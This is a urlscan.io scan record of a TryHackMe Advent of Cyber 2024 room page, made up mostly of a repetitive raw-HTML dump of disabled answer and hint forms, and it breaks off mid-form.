tryhackme.com
Open in
urlscan Pro
172.67.27.10
Public Scan
URL:
https://tryhackme.com/r/room/adventofcyber2024?utm_source=customer.io&utm_medium=email&utm_campaign=aoc2024&utm_conten...
Submission: On December 05 via api from RU — Scanned from IT
Submission: On December 05 via api from RU — Scanned from IT
Form analysis 40 forms found in the DOM
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="8" name="8" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
